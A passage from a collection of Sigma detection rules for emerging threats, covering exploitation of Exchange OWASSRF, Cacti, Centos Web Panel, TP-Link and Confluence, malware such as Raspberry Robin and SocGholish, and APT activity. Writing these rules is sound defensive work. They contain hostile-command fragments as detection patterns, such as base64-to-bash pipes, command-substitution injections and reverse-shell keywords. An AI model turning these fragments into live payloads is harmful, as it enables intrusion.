    "content": "title: OWASSRF Exploitation Attempt Using Public POC - Proxy\nid: fdd7e904-7304-4616-a46a-e32f917c4be4\nstatus: test\ndescription: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint\nreferences:\n    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/\n    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/\n    - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-22\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        # Look for the header: X-OWA-ExplicitLogonUser: owa/mastermailbox@outlook.com\n        c-useragent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'\n        cs-method: 'POST'\n        sc-status: 200\n        c-uri|contains|all:\n            - '/owa/mastermailbox'\n            - '/powershell'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-41082/web_cve_2022_36804_exchange_owassrf_exploitation.yml",
    "content": "title: Potential OWASSRF Exploitation Attempt - Webserver\nid: 181f49fa-0b21-4665-a98c-a57025ebb8c7\nstatus: test\ndescription: Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint\nreferences:\n    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/\n    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-22\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        sc-status: 200\n        cs-uri-query|contains|all:\n            - '/owa/'\n            - '/powershell'\n        cs-uri-query|contains:\n            - '@'\n            - '%40'\n    filter_main_ua:\n        cs-user-agent:\n            - 'ClientInfo'\n            - 'Microsoft WinRM Client'\n            - 'Exchange BackEnd Probes'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-41082/web_cve_2022_36804_exchange_owassrf_poc_exploitation.yml",
    "content": "title: OWASSRF Exploitation Attempt Using Public POC - Webserver\nid: 92d78c63-5a5c-4c40-9b60-463810ffb082\nstatus: test\ndescription: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint\nreferences:\n    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/\n    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/\n    - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-22\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        # Look for the header: X-OWA-ExplicitLogonUser: owa/mastermailbox@outlook.com\n        cs-user-agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'\n        cs-method: 'POST'\n        sc-status: 200\n        cs-uri-query|contains|all:\n            - '/owa/mastermailbox'\n            - '/powershell'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml",
    "content": "title: Suspicious Sysmon as Execution Parent\nid: 6d1058a4-407e-4f3a-a144-1968c11dc5c3\nstatus: test\ndescription: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120\n    - https://twitter.com/filip_dragovic/status/1590052248260055041\n    - https://twitter.com/filip_dragovic/status/1590104354727436290\nauthor: Florian Roth (Nextron Systems), Tim Shelton (fp werfault)\ndate: 2022-11-10\nmodified: 2025-07-04\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2022-41120\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\Sysmon.exe'\n            - '\\Sysmon64.exe'\n    filter_main_temp_sysmon:\n        # C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\2\\Sysmon.exe\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Temp\\'\n        Image|endswith:\n            - '\\Sysmon.exe'\n            - '\\Sysmon64.exe'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Windows\\Sysmon.exe'\n            - ':\\Windows\\Sysmon64.exe'\n            - ':\\Windows\\System32\\conhost.exe'\n            - ':\\Windows\\System32\\WerFault.exe' # When Sysmon crashes\n            - ':\\Windows\\System32\\WerFaultSecure.exe' # When Sysmon crashes\n            - ':\\Windows\\System32\\wevtutil.exe'\n            - ':\\Windows\\SysWOW64\\wevtutil.exe'\n    filter_main_null:\n        Image: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-42475/fortios_sslvpnd_exploit_cve_2022_42475_exploitation_indicators.yml",
    "content": "title: Exploitation Indicator Of CVE-2022-42475\nid: 293ccb8c-bed8-4868-8296-bef30e303b7e\nstatus: test\ndescription: Detects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-22-398\n    - https://www.bleepingcomputer.com/news/security/fortinet-says-ssl-vpn-pre-auth-rce-bug-is-exploited-in-attacks/\n    - https://www.deepwatch.com/labs/customer-advisory-fortios-ssl-vpn-vulnerability-cve-2022-42475-exploited-in-the-wild/\n    - https://community.fortinet.com/t5/FortiGate/Technical-Tip-Critical-vulnerability-Protect-against-heap-based/ta-p/239420\nauthor: Nasreddine Bencherchali (Nextron Systems), Nilaa Maharjan, Douglasrose75\ndate: 2024-02-08\ntags:\n    - attack.initial-access\n    - cve.2022-42475\n    - detection.emerging-threats\nlogsource:\n    product: fortios\n    service: sslvpnd\n    definition: 'Requirements: file creation events or equivalent must be collected from the FortiOS SSL-VPN appliance in order for this detection to function correctly'\ndetection:\n    keywords:\n        - '/data/etc/wxd.conf'\n        - '/data/lib/libgif.so'\n        - '/data/lib/libips.bak'\n        - '/data/lib/libiptcp.so'\n        - '/data/lib/libipudp.so'\n        - '/data/lib/libjepg.so'\n        - '/var/.sslvpnconfigbk'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-44877/web_cve_2022_44877_exploitation_attempt.yml",
    "content": "title: Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877\nid: 1b2eeb27-949b-4704-8bfa-d8e5cfa045a1\nstatus: test\ndescription: Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877\nreferences:\n    - https://seclists.org/fulldisclosure/2023/Jan/1\n    - https://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-20\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-44877\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains|all:\n            - '/login/index.php'\n            - 'login='\n        cs-uri-query|contains:\n            # TOD: Include other commonly used reverse shells. Examples: https://www.revshells.com/\n            - 'login=$('\n            # Common keywords related to python reverse shells\n            - 'base64'\n            - 'subprocess'\n            - 'socket'\n            - '${IFS}' # Usage of the input field separator to avoid writing spaces\n            # B64 Encoded \"python\" with different offsets\n            - 'cHl0aG9u'\n            - 'B5dGhvb'\n            - 'weXRob2'\n    condition: selection\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-46169/web_cve_2022_46169_cacti_exploitation_attempt.yml",
    "content": "title: Potential CVE-2022-46169 Exploitation Attempt\nid: 738cb115-881f-4df3-82cc-56ab02fc5192\nstatus: test\ndescription: Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169\nreferences:\n    - https://github.com/0xf4n9x/CVE-2022-46169\n    - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf\n    - https://github.com/rapid7/metasploit-framework/pull/17407\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-27\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-46169\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        # Check for the presence of the X-FORWARDED-FOR header pointing to the hostname of the server running Cacti (which indicate auth bypass)\n        # Check for previous requests indicating the bruteforce of the \"local_data_ids\" and \"host_id\"\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/remote_agent.php'\n            - 'action=polldata'\n            - 'poller_id='\n        cs-uri-query|contains:\n            # From https://github.com/rapid7/metasploit-framework/pull/17407/files#diff-972a47250ccd30b935a59e8871134956a15980df5b29f9d970414646704d5258R288\n            # Not tested could be shown in other format (update if you have more info)\n            - '| base64 -d | /bin/bash`'\n            - '%7C%20base64%20-d%20%7C%20%2Fbin%2Fbash%60' # URL encoded version\n            # Add more suspicious commands accordingly\n            - '`whoami'\n            - 'powershell'\n            - 'cmd'\n            - 'wget'\n    condition: selection\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml",
    "content": "title: BlueSky Ransomware Artefacts\nid: eee8311f-a752-44f0-bf2f-6b007db16300\nstatus: test\ndescription: Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt.\nreferences:\n    - https://unit42.paloaltonetworks.com/bluesky-ransomware/\nauthor: j4son\ndate: 2023-05-23\ntags:\n    - attack.impact\n    - attack.t1486\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_access_eid:\n        EventID:\n            - 4663\n            - 4656\n    selection_access_data:\n        - ObjectName|endswith: '.bluesky'\n        - ObjectName|contains: 'DECRYPT FILES BLUESKY'\n    selection_share_eid:\n        EventID: 5145\n    selection_share_data:\n        - RelativeTargetName|endswith: '.bluesky'\n        - RelativeTargetName|contains: 'DECRYPT FILES BLUESKY'\n    condition: all of selection_access_* or all of selection_share_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Bumblebee/create_remote_thread_win_malware_bumblebee.yml",
    "content": "title: Potential Bumblebee Remote Thread Creation\nid: 994cac2b-92c2-44bf-8853-14f6ca39fbda\nstatus: test\ndescription: Detects remote thread injection events based on action seen used by bumblebee\nreferences:\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.011\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\wabmig.exe'\n            - '\\wab.exe'\n            - '\\ImagingDevices.exe'\n        TargetImage|endswith: '\\rundll32.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/ChromeLoader/proc_creation_win_malware_chrome_loader_execution.yml",
    "content": "title: ChromeLoader Malware Execution\nid: 0a74c5a9-1b71-4475-9af2-7829d320d5c2\nstatus: test\ndescription: Detects execution of ChromeLoader malware via a registered scheduled task\nreferences:\n    - https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\n    - https://twitter.com/th3_protoCOL/status/1480621526764322817\n    - https://twitter.com/Kostastsale/status/1480716528421011458\n    - https://www.virustotal.com/gui/file/ded20df574b843aaa3c8e977c2040e1498ae17c12924a19868df5b12dee6dfdd\nauthor: '@kostastsale'\ndate: 2022-01-10\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.001\n    - attack.t1176\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\powershell.exe'\n        ParentCommandLine|contains: '-ExecutionPolicy Bypass -WindowStyle Hidden -E JAB'\n        CommandLine|contains: '--load-extension=\"*\\Appdata\\local\\chrome\"'\n        Image|endswith: '\\chrome.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Emotet/proc_creation_win_malware_emotet_loader_execution.yml",
    "content": "title: Emotet Loader Execution Via .LNK File\nid: 1f32d820-1d5c-43fe-8fe2-feef0c952eb7\nstatus: test\ndescription: |\n    Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.\n    The \".lnk\" file was delivered via phishing campaign.\nreferences:\n    - https://web.archive.org/web/20220422215221/https://twitter.com/malware_traffic/status/1517622327000846338\n    - https://twitter.com/Cryptolaemus1/status/1517634855940632576\n    - https://tria.ge/220422-1pw1pscfdl/\n    - https://tria.ge/220422-1nnmyagdf2/\nauthor: '@kostastsale'\ndate: 2022-04-22\nmodified: 2024-08-15\ntags:\n    - attack.execution\n    - attack.t1059.006\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\explorer.exe'\n            - '\\powershell.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n        CommandLine|contains|all:\n            - 'findstr'\n            - '.vbs'\n            - '.lnk'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml",
    "content": "title: Hermetic Wiper TG Process Patterns\nid: 2f974656-6d83-4059-bbdf-68ac5403422f\nstatus: test\ndescription: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022\nreferences:\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-25\nmodified: 2022-09-09\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1021.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\policydefinitions\\postgresql.exe'\n    selection2:\n        - CommandLine|contains:\n              - 'CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp'\n              - ' 1> \\\\\\\\127.0.0.1\\ADMIN$\\__16'\n        - CommandLine|contains|all:\n              - 'powershell -c '\n              - '\\comsvcs.dll MiniDump '\n              - '\\winupd.log full'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_execution.yml",
    "content": "title: Raspberry Robin Subsequent Execution of Commands\nid: d52d2e87-eb03-4fac-961d-eb616da79788\nrelated:\n    - id: 2c6bea3a-ef58-4f2e-a775-4928f6b7c58a\n      type: similar\nstatus: test\ndescription: Detects raspberry robin subsequent execution of commands.\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\nauthor: '@kostastsale'\ndate: 2022-05-06\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\fodhelper.exe'\n        Image|endswith:\n            - '\\rundll32.exe'\n            - '\\regsvr32.exe'\n        CommandLine|contains|all:\n            - 'odbcconf.exe'\n            - 'regsvr'\n            - 'shellexec_rundll'\n        CommandLine|contains:\n            - 'installdriver'\n            - 'setfiledsndir'\n            - 'vkipdse'\n        CommandLine|endswith|windash:\n            - '/a'\n            - '/f'\n            - '/s'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_external_drive_exec.yml",
    "content": "title: Raspberry Robin Initial Execution From External Drive\nid: 2c6bea3a-ef58-4f2e-a775-4928f6b7c58a\nrelated:\n    - id: d52d2e87-eb03-4fac-961d-eb616da79788\n      type: similar\nstatus: test\ndescription: Detects the initial execution of the Raspberry Robin malware from an external drive using \"Cmd.EXE\".\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\nauthor: '@kostastsale'\ndate: 2022-05-06\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\cmd.exe'\n        ParentCommandLine|contains: '/r'\n        ParentCommandLine|endswith:\n            - '.bin'\n            - '.ico'\n            - '.lnk'\n            - '.lo'\n            - '.sv'\n            - '.usb'\n    selection_child_img:\n        Image|endswith: '\\msiexec.exe'\n        CommandLine|contains|windash: '/q'\n    selection_child_http:\n        CommandLine|contains:\n            - 'http:'\n            - 'https:'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml",
    "content": "title: Potential Raspberry Robin Dot Ending File\nid: a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a\nstatus: test\ndescription: Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin\nauthor: Nasreddine Bencherchali (Nextron Systems)\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\ndate: 2022-10-28\nmodified: 2023-02-05\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Example 1: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-3f-raspberryrobin-runonce.png\n        # Example 2: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-5f-odbcconf.png\n        # Example 3: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-6f-fauppod-command-line.png\n        CommandLine|re: \\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}  # cannot match on end-of-line because of FPs with bind DNS notation\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Serpent-Backdoor/proc_creation_win_malware_serpent_backdoor_payload_execution.yml",
    "content": "title: Serpent Backdoor Payload Execution Via Scheduled Task\nid: d5eb7432-fda4-4bba-a37f-ffa74d9ed639\nstatus: test\ndescription: |\n    Detects post exploitation execution technique of the Serpent backdoor.\n    According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method.\n    It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.\nreferences:\n    - https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\nauthor: '@kostastsale'\ndate: 2022-03-21\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.006\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n        CommandLine|contains|all:\n            - '[System/EventID='\n            - '/create'\n            - '/delete'\n            - '/ec'\n            - '/so'\n            - '/tn run'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/SocGholish/proc_creation_win_malware_socgholish_fakeupdates_activity.yml",
    "content": "title: FakeUpdates/SocGholish Activity\nid: 97805087-93ab-4203-b5cb-287cda6aecaa\nstatus: test\ndescription: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.\nreferences:\n    - https://twitter.com/th3_protoCOL/status/1536788652889497600\n    - https://twitter.com/1ZRR4H/status/1537501582727778304\nauthor: '@kostastsale'\ndate: 2022-06-16\nmodified: 2024-08-23\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\wscript.exe'\n        ParentCommandLine|contains|all:\n            - '\\AppData\\Local\\Temp'\n            - '.zip'\n            - 'update'\n            - '.js'\n        ParentCommandLine|contains:\n            - 'Chrome'\n            - 'Edge'\n            - 'Firefox'\n            - 'Opera'\n            - 'Brave' # Not seen in campaigns\n            - 'Vivaldi' # Not seen in campaigns\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/win_mssql_sp_maggie.yml",
    "content": "title: MSSQL Extended Stored Procedure Backdoor Maggie\nid: 711ab2fe-c9ba-4746-8840-5228a58c3cb8\nstatus: test\ndescription: This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server\nreferences:\n    - https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01\nauthor: Denis Szadkowski, DIRT / DCSO CyTec\ndate: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'MSSQLSERVER'\n        EventID: 8128\n        Message|contains: 'maggie'\n    condition: selection\nfalsepositives:\n    - Legitimate extended stored procedures named maggie\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml",
    "content": "title: Potential ACTINIUM Persistence Activity\nid: e1118a8f-82f5-44b3-bb6b-8a284e5df602\nstatus: test\ndescription: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2022-02-07\nmodified: 2023-03-18\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\n    - attack.t1053.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'schtasks'\n            - 'create'\n            - 'wscript'\n            - ' /e:vbscript'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml",
    "content": "title: MERCURY APT Activity\nid: a62298a3-1fe0-422f-9a68-ffbcbc5a123d\nstatus: test\ndescription: Detects suspicious command line patterns seen being used by MERCURY APT\nreferences:\n    - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-26\nmodified: 2023-03-10\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.g0069\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '-exec bypass -w 1 -enc'\n            - 'UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA'  # Start-Job -ScriptBlock\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-1389/proxy_exploit_cve_2023_1389_unauth_command_injection_tplink_archer_ax21.yml",
    "content": "title: CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21\nid: 6c7defa9-69f8-4c34-b815-41fce3931754\nstatus: test\ndescription: |\n    Detects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21.\nreferences:\n    - https://www.tenable.com/security/research/tra-2023-11\n    - https://github.com/Voyag3r-Security/CVE-2023-1389/blob/4ecada7335b17bf543c0e33b2c9fb6b6215c09ae/archer-rev-shell.py\n    - https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal\nauthor: Nasreddine Bencherchali (Nextron Systems), Rohit Jain\ndate: 2024-06-25\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-1389\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection_uri:\n        cs-method:\n            - 'GET'\n            - 'POST'\n        cs-uri|contains|all:\n            - '/cgi-bin/luci/;stok=/locale'\n            - 'form=country'\n    selection_keyword:\n        - 'operation=write'\n        - 'country=$('\n    condition: all of selection_*\nfalsepositives:\n    - Vulnerability Scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-20198/cisco_syslog_cve_2023_20198_ios_xe_web_ui.yml",
    "content": "title: Exploitation Indicators Of CVE-2023-20198\nid: 2ece8816-b7a0-4d9b-b0e8-ae7ad18bc02b\nstatus: test\ndescription: Detecting exploitation indicators of CVE-2023-20198 a privilege escalation vulnerability in Cisco IOS XE Software Web UI.\nreferences:\n    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z\n    - https://www.thestack.technology/security-experts-call-for-incident-response-exercises-after-mass-cisco-device-exploitation/\nauthor: Lars B. P. Frydenskov (Trifork Security)\ndate: 2023-10-20\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - detection.emerging-threats\nlogsource:\n    product: cisco\n    service: syslog\n    definition: 'Requirements: Cisco IOS XE system logs needs to be configured and ingested'\ndetection:\n    keyword_event:\n        - '%WEBUI-6-INSTALL_OPERATION_INFO:'\n        - '%SYS-5-CONFIG_P:'\n        - '%SEC_LOGIN-5-WEBLOGIN_SUCCESS:'\n    keyword_user:\n        - 'cisco_tac_admin'\n        - 'cisco_support'\n        - 'cisco_sys_manager'\n    condition: keyword_event and keyword_user\nfalsepositives:\n    - Rare false positives might occur if there are valid users named \"cisco_tac_admin\" or \"cisco_support\", which are not created by default or CISCO representatives\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-21554/win_cve_2023_21554_msmq_corrupted_packet.yml",
    "content": "title: MSMQ Corrupted Packet Encountered\nid: ae94b10d-fee9-4767-82bb-439b309d5a27\nstatus: test\ndescription: Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation\nreferences:\n    - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-21\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'MSMQ'\n        EventID: 2027\n        Level: 2\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_lnx_exploit_cve_2023_22518_confluence_java_child_proc.yml",
    "content": "title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)\nid: f8987c03-4290-4c96-870f-55e75ee377f4\nrelated:\n    - id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.\nreferences:\n    - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html\n    - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment\n    - https://github.com/ForceFledgling/CVE-2023-22518\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-11-14\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-22518\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_parent:\n        ParentImage|endswith: '/java'\n        ParentCommandLine|contains: 'confluence'\n    selection_child:\n        # Only children associated with known campaigns\n        Image|endswith:\n            - '/bash'\n            - '/curl'\n            - '/echo'\n            - '/wget'\n    